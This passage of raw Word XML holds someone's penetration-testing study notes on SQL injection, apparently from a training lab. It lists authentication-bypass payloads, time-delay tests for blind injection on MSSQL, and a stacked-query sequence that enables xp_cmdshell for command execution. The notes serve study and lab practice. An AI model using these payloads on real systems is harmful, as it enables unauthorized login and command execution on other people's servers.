          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;username&gt;'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001748">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select 1, '&lt;user-fieldname&gt;', '&lt;pass-fieldname&gt;' 1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001749">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some more SQL Authentication bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this into the username section and put some dummy value in password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000174F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001750">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001751">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001752">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in username to log in as admin or try any other username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001753">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001754">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001755">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="743"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001756">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017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758">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ac7zo345unf4" w:id="191"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual Code Execution for SQL (SQL Injections)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001759">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e2iucmkox5js" w:id="192"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling command execution with xp_cmdshell through website </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(only works for mssql)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I didn't know this before but xp_cmdshell command execution only exists on mssql. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 10.3.1. Manual Code Execution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000175F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MedTech Challenge lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We saw a login page that showed a SQL error when you put in a single quote (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for the username. But then after trying UNION-based SQL injection, it wouldn't display a table so we test for blind SQL injection and we confirmed there was SQL injection but there is simply no table output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001760">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001761">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId471">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PortSwigger</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a section on testing for SQL injection using time-delays, and it worked here too. This is another way to confirm blind SQL injection. This one is for MSSQL only but more can be found on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId472">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">portswigger SQL cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001762">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=2) WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001763">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn't delay at all </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=1) WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001765">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It delays for 10 seconds, confirming there is SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001766">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001767">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simply doing this also works</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001768">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001769">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, we don't need visual output to get manual code execution, so we did this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC sp_configure 'show advanced options',1;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC sp_configure 'xp_cmdshell',1;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001770">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or just this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001772">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="877"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this only works when they allow you to stack multiple commands at once, which not all systems do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001773">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001774">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The syntax</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> '; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means first use a quote to end the original query string, and then use semicolon to officially end the entire statement and get ready to start a new one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001775">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001776">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also I tried the whole process with only ' and not any ; and it worked. I think the ; was unnecessary and most sql injection guides don't include it. But good to include just in case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001777">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001778">
